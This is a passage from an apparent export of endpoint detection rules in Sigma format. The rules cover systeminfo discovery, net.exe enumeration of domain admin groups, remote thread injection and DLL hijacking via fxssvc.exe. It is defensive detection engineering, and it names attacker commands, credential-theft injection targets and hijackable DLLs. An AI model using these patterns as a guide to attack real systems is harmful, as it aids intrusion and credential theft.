'?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_programfiles:\n - ProcessParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - ProcessGrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_template_gpscript:\n 
ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_image:\n - ParentImage:\n - '*\\AppData\\Local\\ElsterAuthenticator\\ElsterAuthenticator.exe'\n - '?:\\pilote\\NoyauEVM\\NoyauEVM.exe'\n - '?:\\Windows\\System32\\msiexec.exe'\n - GrandparentImage:\n - '*\\AppData\\Local\\Programs\\Alcatel-Lucent Enterprise\\Rainbow\\Rainbow.exe'\n - '?:\\\\*\\Applications\\PatchManager\\W100TInstaller\\W100TInstallerSvc.exe'\n - '?:\\Xilinx\\xic\\tps\\win64\\\\*\\bin\\java.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MpCmdRun.exe'\n - '?:\\Users\\\\*\\IBM\\ClientSolutions\\Start_Programs\\Windows_x86-64\\acslaunch_win-64.exe'\n - '?:\\ManageEngine\\UEMS_DistributionServer\\bin\\dcagentregister.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Program Files\\Palo Alto Networks\\Traps\\cyserver.exe'\n - '?:\\Program Files (x86)\\Trend Micro\\Endpoint Basecamp\\EndpointBasecamp.exe'\n - '?:\\Program Files (x86)\\Lenovo\\System Update\\SUService.exe'\n - '?:\\Program Files\\AVAST Software\\Business Agent\\agentsvc.exe'\n - '\\MSSQL\\Binn\\sqlservr.exe'\n - '?:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe'\n - '?:\\Windows\\ADDMRemQuery_x86_64_v2.exe'\n - '?:\\Program Files (x86)\\Lenovo\\VantageService\\\\*\\LenovoVantageService.exe'\n - '?:\\Program Files\\SentinelOne\\Sentinel Agent *\\SentinelAgent.exe'\n\n exclusion_commvault_diagnostics:\n GrandparentImage|endswith: 'CvDiagnostics.exe'\n\n exclusion_lenovo_systemupdate1:\n # great great grandfather is: \"C:\\Program Files (x86)\\Lenovo\\System Update\\\\Tvsukernel.exe\"\n # great great grandfather is: C:\\PROGRA~3\\Lenovo\\SYSTEM~1\\SESSIO~1\\REPOSI~1\\n1nuj32w\\WINUPTP.EXE\n # grandfather is: \"C:\\Windows\\sysnative\\cmd.exe\" \"/c susbde.bat\"\n GrandparentCommandLine|contains|all:\n - '\\Windows\\sysnative\\cmd.exe'\n - 'susbde.bat'\n\n exclusion_lenovo_systemupdate2:\n GrandparentCommandLine:\n # cmd.exe /C 
C:\\ProgramData\\Lenovo\\SystemUpdate\\sessionSE\\Repository\\n20rg22w\\SusBde.bat\n - 'cmd.exe /C ?:\\ProgramData\\Lenovo\\SystemUpdate\\sessionSE\\Repository\\\\*\\SusBde.bat'\n # cmd.exe /C C:\\ProgramData\\Lenovo\\ImController\\SystemPluginData\\LenovoSystemUpdatePlugin\\session\\Repository\\n2irg32w\\SusBde.bat\n - 'cmd.exe /C ?:\\ProgramData\\Lenovo\\ImController\\SystemPluginData\\LenovoSystemUpdatePlugin\\\\*\\SusBde.bat'\n # cmd.exe /C C:\\ProgramData\\Lenovo\\Vantage\\AddinData\\LenovoSystemUpdateAddin\\session\\Repository\\n2hrg33w\\SusBde.bat\n - 'cmd.exe /C ?:\\ProgramData\\Lenovo\\Vantage\\AddinData\\LenovoSystemUpdateAddin\\session\\Repository\\\\*\\SusBde.bat'\n CommandLine: '?:\\windows\\System32\\systeminfo.exe /FO CSV /NH'\n\n exclusion_dfir_orc:\n ParentImage: '*\\DFIR-Orc_x64.exe'\n ParentCommandLine|contains: ' WolfLauncher'\n\n exclusion_vscode:\n ParentImage: '?:\\Windows\\System32\\cmd.exe'\n GrandparentImage|endswith: '\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n\n exclusion_sara:\n ParentCommandLine: 'powershell.exe (systeminfo /fo csv | ConvertFrom-Csv | Select-Object OS\\*)'\n GrandparentImage|endswith: '\\Microsoft.Sara.exe'\n\n exclusion_vmware:\n ParentCommandLine:\n # /s /v/qn /L\n # /s /v/qb-\n # /mg /s /v/qb-\n - '?:\\Windows\\TEMP\\vmware-SYSTEM\\\\????????\\setup64.exe * REBOOT=R VMREBOOTPROMPT=Y /L ?:\\Windows\\TEMP\\vmware-SYSTEM\\vmupgrader_msi.log_????????_??????.log'\n - '?:\\Windows\\TEMP\\vmware-Système\\\\????????\\setup64.exe * REBOOT=R VMREBOOTPROMPT=Y /L ?:\\Windows\\TEMP\\vmware-Système\\vmupgrader_msi.log_????????_??????.log'\n - '?:\\Windows\\TEMP\\vmware-SYSTEM\\\\????????\\setup64.exe /mg /s /v/qn'\n - '?:\\Windows\\TEMP\\vmware-Système\\\\????????\\setup64.exe /mg /s /v/qn'\n - '?:\\Windows\\TEMP\\vmware-SYSTEM-??????????\\\\????????\\setup64.exe /mg /s /v/qn'\n - '?:\\Windows\\TEMP\\vmware-Système-??????????\\\\????????\\setup64.exe /mg /s /v/qn'\n - 
'?:\\Windows\\TEMP\\vmware-SYSTEM\\\\????????\\setup64.exe /s /v/qn'\n - '?:\\Windows\\TEMP\\vmware-Système\\\\????????\\setup64.exe /s /v/qn'\n GrandparentImage:\n - '?:\\Windows\\Temp\\vmware-SYSTEM\\\\????????\\setup.exe'\n - '?:\\Windows\\Temp\\vmware-Système\\\\????????\\setup.exe'\n\n exclusion_ivanti:\n # Ivanti Patch Management service\n ParentCommandLine|startswith: '?:\\Windows\\ProPatches\\Patches\\'\n CurrentDirectory: '?:\\Windows\\ProPatches\\Installation\\InstallationSandbox#????-??-??-T-??-??-??'\n\n exclusion_azure_networkwatcher:\n ParentCommandLine: '?:\\Windows\\System32\\cmd.exe /c systeminfo >> config\\osinfo.txt'\n GrandparentCommandLine: '?:\\Windows\\system32\\cscript.exe ?:\\Windows\\system32\\gatherNetworkInfo.vbs'\n\n exclusion_gitkraken:\n GrandparentImage: '?:\\Users\\\\*\\AppData\\Local\\gitkraken\\app-*\\gitkraken.exe'\n\n exclusion_netbackup:\n Ancestors|contains: '|?:\\Windows\\System32\\cmd.exe|?:\\Program Files\\Veritas\\NetBackup\\var\\tmp\\telemetry\\par-*\\temp-*\\nbtelemetry.exe|'\n\n exclusion_manageengine1:\n GrandparentCommandLine|contains: ';../lib/AdventNetUpdateManagerInstaller.jar;'\n GrandparentImage|endswith: '\\bin\\java.exe'\n\n exclusion_manageengine2:\n ProcessGrandparentProduct: 'ADManager Plus'\n ProcessGrandparentCompany: 'Zoho Corporation Pvt. 
Ltd.'\n\n exclusion_flexera:\n ProcessGrandparentOriginalFileName: 'gui.exe'\n ProcessGrandparentDescription: 'LaunchAnywhere'\n ProcessGrandparentCompany: 'Flexera Software'\n\n exclusion_rocket:\n ProcessParentImage|endswith:\n - '\\Rocket.exe'\n - '\\Lts.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature|contains: 'AREAL SAS'\n\n exclusion_intersystems:\n ProcessGrandparentOriginalFileName:\n - 'Cache.exe'\n - 'irisdb.exe'\n ProcessGrandparentCompany: 'InterSystems'\n\n exclusion_actuate:\n ProcessParentOriginalFileName: 'pmd11.exe'\n ProcessParentCompany: 'Actuate Corporation'\n\n exclusion_siemens:\n GrandparentCommandLine: '?:\\Windows\\System32\\cmd.exe /C ?:\\Program Files\\Siemens\\syngo\\OperationalManagement\\HealthCheck\\runHealthCheckInShell.bat'\n\n exclusion_carestream:\n GrandparentCommandLine|contains: 'perl*?:\\PROGRA~1\\CAREST~1\\System5\\scripts\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7f521bea-fbfa-4c6c-8d8b-391265ec0d9c",
"rule_name": "Systeminfo Execution",
"rule_description": "Detects the execution of systeminfo.exe.\nSysteminfo.exe is a legitimate Microsoft binary that can be used by attackers during the discovery phase to gather detailed information about a computer.\nIt is recommended to analyze the process responsible for the execution of systeminfo.exe to look for malicious content or actions.\n",
"rule_creation_date": "2021-04-01",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1082"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7f5ee141-ceb0-477a-8817-f631dba06a51",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083690Z",
"creation_date": "2026-03-23T11:45:34.083692Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083696Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
"https://techcommunity.microsoft.com/t5/security-compliance-and-identity/track-changes-to-sensitive-groups-with-advanced-hunting-in/ba-p/3275198",
"https://attack.mitre.org/techniques/T1069/002/"
],
"name": "t1069_002_net_sensitive_group.yml",
"content": "title: Sensitive Group Content Discovered via net.exe\nid: 7f5ee141-ceb0-477a-8817-f631dba06a51\ndescription: |\n Detects the execution of the net command to discover the content of sensitive groups.\n The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\n Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n It is recommended to correlate this alert with other discovery activity and suspicious connections on the network.\nreferences:\n - https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/\n - https://techcommunity.microsoft.com/t5/security-compliance-and-identity/track-changes-to-sensitive-groups-with-advanced-hunting-in/ba-p/3275198\n - https://attack.mitre.org/techniques/T1069/002/\ndate: 2023/04/05\nmodified: 2025/10/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ActiveDirectory\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # net group domain administrators /domain\n # net group domain admins /domain\n # net group Admins du domaine /domain\n selection_image:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n selection_domain:\n CommandLine|contains: ' /dom'\n\n selection_group_admin:\n CommandLine|contains|all:\n - ' admin'\n - ' domain'\n selection_group_other:\n CommandLine|contains:\n - 'Account Operators'\n - 'Backup Operators'\n - 'Domain Computers'\n - 'Domain Controllers'\n - 'Enterprise Admins'\n - 'Exchange Trusted Subsystem'\n - 'Exchange Organization Administrators'\n - 'Microsoft Exchange Servers'\n - 'Print Operators'\n - 'Schema Admins'\n - 'Server Operators'\n\n condition: selection_image and selection_domain and 1 of 
selection_group_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7f5ee141-ceb0-477a-8817-f631dba06a51",
"rule_name": "Sensitive Group Content Discovered via net.exe",
"rule_description": "Detects the execution of the net command to discover the content of sensitive groups.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\nIt is recommended to correlate this alert with other discovery activity and suspicious connections on the network.\n",
"rule_creation_date": "2023-04-05",
"rule_modified_date": "2025-10-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1069.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7f69ffe6-5b1a-43bb-b560-4d69ff1d5166",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619888Z",
"creation_date": "2026-03-23T11:45:34.619890Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619895Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_suspicious_remote_thread_uncommon_location.yml",
"content": "title: Remote Thread Created from Process in Uncommon Location\nid: 7f69ffe6-5b1a-43bb-b560-4d69ff1d5166\ndescription: |\n Detects suspicious remote threads that are not mapped to a legitimate DLL/executable and created by a process in an uncommon location.\n Adversaries may inject malicious code in a web browser (ie. Firefox, Chrome, Edge...) or in LSASS to steal sensitive information such as credentials.\n If the thread is injected in another process, it could be an attempt at performing malicious activity within a legitimate process.\n It is recommended to investigate the process injecting the thread and the injected process for suspicious activity such as uncommon network connections or child processes.\nreferences:\n - https://attack.mitre.org/techniques/T1055/\ndate: 2023/12/11\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: remote_thread\ndetection:\n selection:\n SourceImage|startswith:\n - '?:\\perflogs\\'\n - '?:\\Users\\'\n - '?:\\programdata\\'\n - '?:\\Windows\\'\n - '?:\\\\?Recycle.Bin\\'\n exclusion_module:\n StartModule|contains:\n - '.dll'\n - '.exe'\n - '.com'\n exclusion_defender:\n SourceImage|endswith: '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n exclusion_firefox_flash:\n ProcessOriginalFileName: 'firefox.exe'\n TargetImage|contains: 'FlashPlayerPlugin'\n exclusion_edge:\n SourceImage|endswith: '\\Microsoft\\Edge\\Application\\msedge.exe'\n TargetImage|endswith: '\\Microsoft\\Edge\\Application\\msedge.exe'\n exclusion_chrome:\n SourceImage|endswith: 'chrome.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Google Inc'\n - 'Google LLC'\n TargetImage|endswith: '\\chrome.exe'\n exclusion_chromium:\n 
SourceImage|endswith: 'chromium.exe'\n ProcessSigned: 'true'\n TargetImage|endswith: '\\chromium.exe'\n exclusion_IpDivaVpn:\n SourceImage|endswith: '\\IpDivaVpnTunnelingStarter\\AdisProcessInjection64.exe'\n TargetImage: '?:\\Windows\\System32\\mstsc.exe'\n exclusion_java:\n SourceImage|endswith:\n - '\\bin\\jconsole.exe'\n - '\\bin\\java.exe'\n - '\\bin\\javaw.exe'\n - '\\bin\\jcmd.exe'\n - '\\bin\\idea64.exe'\n - '\\bin\\jmap.exe'\n - '\\bin\\jmc.exe'\n - '\\bin\\jstack.exe'\n - '\\bin\\jprofiler.exe'\n TargetImage|endswith:\n - '\\bin\\jconsole.exe'\n - '\\bin\\java.exe'\n - '\\bin\\javaw.exe'\n - '\\bin\\jcmd.exe'\n - '\\bin\\idea64.exe'\n - '\\bin\\jmap.exe'\n - '\\bin\\keytool.exe'\n - '\\eclipse.exe'\n - '\\pc-client.exe' # papercut\n - '\\Jaspersoft Studio.exe' # TIBCO\\Jaspersoft Studio\n - '\\SpringToolSuite4.exe'\n - '\\SpringToolSuite.exe'\n exclusion_anydesk:\n SourceImage|contains: 'anydesk'\n TargetImage: '?:\\Windows\\System32\\dwm.exe'\n exclusion_clink:\n SourceImage|endswith: 'clink\\clink_x64.exe'\n TargetImage: '?:\\Windows\\System32\\cmd.exe'\n exclusion_taskbar:\n SourceImage|endswith: '7+ Taskbar Tweaker\\7+ Taskbar Tweaker.exe'\n TargetImage: '?:\\Windows\\explorer.exe'\n exclusion_mcafee:\n - SourceImage:\n - '?:\\ProgramData\\McAfee\\Agent\\Evaluation\\ENDP_*\\Install\\0000\\\\mfeepmpk_utility.exe'\n - '?:\\ProgramData\\McAfee\\Agent\\Evaluation\\ENDP_*\\Install\\0000\\mfeepmpk_utility.exe'\n - '?:\\ProgramData\\McAfee\\Agent\\Current\\ENDP_*\\Install\\0000\\mfeepmpk_utility.exe'\n - '?:\\ProgramData\\McAfee\\Agent\\Previous\\ENDP_*\\Install\\0000\\mfeepmpk_utility.exe'\n - SourceImage|endswith: '\\mfeepmpk_utility.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'McAfee, Inc.'\n - 'Musarubra US LLC'\n exclusion_svchost32b:\n SourceImage: '?:\\Windows\\SysWOW64\\svchost.exe'\n TargetImage:\n - '?:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n - '?:\\Windows\\winsxs\\wow64_microsoft-windows-*\\iexplore.exe'\n 
exclusion_svchost64b:\n SourceImage: '?:\\Windows\\System32\\svchost.exe'\n TargetImage: '?:\\Windows\\System32\\SppExtComObj.Exe'\n exclusion_Netwrix:\n SourceImage: '?:\\Windows\\Netwrix Auditor\\Netwrix Auditor Mailbox Access Core Service\\NombaAgent64.exe'\n TargetImage: '?:\\Program Files\\Microsoft\\Exchange Server\\V14\\Bin\\store.exe'\n exclusion_powercfg:\n SourceImage: '?:\\Windows\\System32\\powercfg.exe'\n TargetImage: '?:\\Windows\\System32\\svchost.exe'\n exclusion_rpcnet:\n - SourceImage: '?:\\Windows\\SysWOW64\\rpcnet.exe'\n TargetImage:\n - '?:\\Windows\\SysWOW64\\rpcnet.exe'\n - '?:\\Windows\\SysWOW64\\svchost.exe'\n - '?:\\Windows\\winsxs\\x86_*\\svchost.exe'\n - ProcessParentImage: '?:\\Windows\\SysWOW64\\rpcnet.exe'\n SourceImage: '?:\\Windows\\SysWOW64\\svchost.exe'\n TargetImage: '?:\\Windows\\SysWOW64\\OpenWith.exe'\n exclusion_rpcnetp:\n SourceImage: '?:\\Windows\\System32\\rpcnetp.exe'\n TargetImage: '?:\\Windows\\SysWOW64\\svchost.exe'\n exclusion_office:\n SourceImage: '?:\\Windows\\System32\\SppExtComObjPatcher.exe'\n TargetImage:\n - '?:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE'\n - '?:\\Windows\\System32\\SppExtComObj.Exe'\n exclusion_rundll32:\n SourceImage: '?:\\Windows\\System32\\rundll32.exe'\n TargetImage:\n - '?:\\Windows\\System32\\SppExtComObj.Exe'\n - '?:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE'\n - '?:\\Windows\\System32\\svchost.exe'\n - '?:\\Windows\\System32\\dwm.exe'\n - '?:\\Windows\\System32\\SearchIndexer.exe'\n - '?:\\Windows\\servicing\\TrustedInstaller.exe'\n - '?:\\Windows\\System32\\Defrag.exe'\n exclusion_winlogon:\n SourceImage: '?:\\Windows\\System32\\winlogon.exe'\n TargetImage:\n - '?:\\Windows\\System32\\csrss.exe'\n - '?:\\Windows\\System32\\services.exe'\n - '?:\\Windows\\System32\\wininit.exe'\n - '?:\\Windows\\System32\\ssText3d.scr'\n - '?:\\Windows\\System32\\scrnsave.scr'\n - 
'?:\\Windows\\System32\\PhotoScreensaver.scr'\n exclusion_old_agent_compatibility: # Exclude some windows binaries due to high fp volume on older agents\n SourceImage:\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n - '?:\\Windows\\System32\\svchost.exe'\n - '?:\\Windows\\winsxs\\x86_*\\svchost.exe'\n - '?:\\Windows\\explorer.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n exclusion_seclore_processwatcher:\n SourceImage|endswith: 'Seclore\\FileSecure\\Desktop Client\\x64\\ProcessWatcher64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Seclore Technology Private Limited'\n exclusion_werfault:\n ProcessCommandLine|contains:\n - '/h /shared'\n - '-u -p * -s *'\n SourceImage: '*\\werfault.exe'\n exclusion_final_code:\n SourceImage|endswith: 'FinalCode\\Application\\FinalCodeLauncher.exe'\n TargetImage|endswith: 'FinalCode\\Application\\UIServer.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Digital Arts Inc.'\n - 'FinalCode, Inc.'\n exclusion_mavinject_appvclient:\n ProcessOriginalFileName:\n - 'mavinject32.exe'\n - 'mavinject64.exe'\n TargetImage|endswith: 'explorer.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n ProcessParentOriginalFileName: 'AppVClient.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Windows'\n exclusion_syspin:\n ProcessOriginalFileName: 'syspin.exe'\n TargetImage: '?:\\Windows\\explorer.exe'\n exclusion_nirsfot_ruasdate:\n ProcessOriginalFileName: 'RunAsDate.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Nir Sofer'\n exclusion_gotoassist:\n ProcessProcessName: 'GoToAssistTools64.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'LogMeIn, Inc.'\n - 'GoTo Technologies USA, LLC'\n exclusion_talendstudio:\n SourceImage: '?:\\Users\\\\*\\Talend-Studio-*.exe'\n TargetImage:\n - '?:\\Users\\\\*\\AppData\\Local\\DBeaver\\dbeaver.exe'\n - '?:\\Users\\\\*\\Talend-Studio-*.exe'\n - '?:\\Program Files*\\Java\\jr*\\bin\\java.exe'\n 
exclusion_conemu:\n ProcessProcessName: 'cmd.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n ProcessParentProcessName: 'ConEmuC64.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Maksim Moisiuk'\n exclusion_ESET:\n ProcessProcessName: 'rundll32.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n ProcessParentProcessName: 'ekrn.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'ESET, spol. s r.o.'\n exclusion_discord:\n ProcessImage|endswith: '\\Discord\\app-*\\modules\\discord_hook-1\\discord_hook\\\\*\\DiscordHookHelper64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Discord Inc.'\n exclusion_audials:\n ProcessImage:\n - '?:\\ProgramData\\Audials\\Audials 2025\\CaptureBackend\\HookHelper32.exe'\n - '?:\\ProgramData\\Audials\\Audials 2025\\CaptureBackend\\HookHelper64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Audials AG'\n exclusion_RPCDnD:\n ProcessImage: '?:\\ProgramData\\RPCDnD\\HelpDesk\\RemotePCDnDLauncher.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'IDrive, Inc.'\n exclusion_jdk_mission_control:\n ProcessImage|endswith: 'JDK Mission Control\\jmc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Oracle America, Inc.'\n exclusion_teruten:\n ProcessOriginalFileName:\n - 'TCubeObserver.exe'\n - 'TDepend64.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Teruten Inc.'\n - 'Teruten, Inc.'\n exclusion_quest:\n ProcessOriginalFileName: 'BTPassSvc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'QUEST SOFTWARE INC.'\n exclusion_wps_office:\n ProcessImage|endswith: '\\AppData\\Local\\Kingsoft\\WPS Office\\\\*\\office6\\pinTaskbar.exe'\n ProcessParentImage|endswith: '\\AppData\\Local\\Kingsoft\\WPS Office\\\\*\\office6\\ksomisc.exe'\n exclusion_roblox:\n SourceImage|endswith: '\\RobloxPlayerBeta.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Roblox Corporation'\n exclusion_windhawk:\n SourceImage|endswith: '\\windhawk.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Michael 
Maltsev'\n exclusion_everest:\n SourceImage|endswith: '\\EGH\\Outils_EGH\\OWDLC64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Everest Software International Pty Ltd'\n exclusion_jetbrains:\n SourceImage|endswith: '\\bin\\phpstorm64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'JetBrains s.r.o.'\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7f69ffe6-5b1a-43bb-b560-4d69ff1d5166",
"rule_name": "Remote Thread Created from Process in Uncommon Location",
"rule_description": "Detects suspicious remote threads that are not mapped to a legitimate DLL/executable and created by a process in an uncommon location.\nAdversaries may inject malicious code into a web browser (e.g. Firefox, Chrome, Edge) or into LSASS to steal sensitive information such as credentials.\nIf the thread is injected into another process, it could be an attempt at performing malicious activity within a legitimate process.\nIt is recommended to investigate the process injecting the thread and the injected process for suspicious activity such as uncommon network connections or child processes.\n",
"rule_creation_date": "2023-12-11",
"rule_modified_date": "2026-02-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7f6edf60-02f1-41f9-b54d-aaa7346dc347",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085456Z",
"creation_date": "2026-03-23T11:45:34.085458Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085463Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fxssvc.yml",
"content": "title: DLL Hijacking via fxssvc.exe\nid: 7f6edf60-02f1-41f9-b54d-aaa7346dc347\ndescription: |\n Detects potential Windows DLL Hijacking via fxssvc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fxssvc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\credui.dll'\n - '\\FXSTIFF.dll'\n - '\\IPHLPAPI.DLL'\n - '\\PROPSYS.dll'\n - '\\TAPI32.dll'\n - '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7f6edf60-02f1-41f9-b54d-aaa7346dc347",
